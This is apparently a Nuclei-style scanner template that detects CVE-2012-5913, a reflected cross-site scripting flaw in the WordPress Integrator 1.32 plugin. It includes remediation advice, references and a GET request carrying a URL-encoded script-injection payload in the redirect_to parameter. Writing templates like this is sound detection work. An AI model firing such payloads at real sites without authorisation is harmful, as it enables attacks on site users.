id: CVE-2012-5913 info: name: WordPress Integrator 1.32 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. remediation: | Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-5913 - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.00828 epss-percentile: 0.80029 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress_integrator_project product: wordpress_integrator tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve http: - method: GET path: - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a004830460221009863d78e21c1df1612c7f7cd1e3df7ce5a5dc36c710c7ac63e921eb2e3edfc3c022100960858731baf49f6a95b0d7d8d9e50166a6b46ffecf69814f9e7abf2d91b6dfa:922c64590222798bb761d5b6d8e72950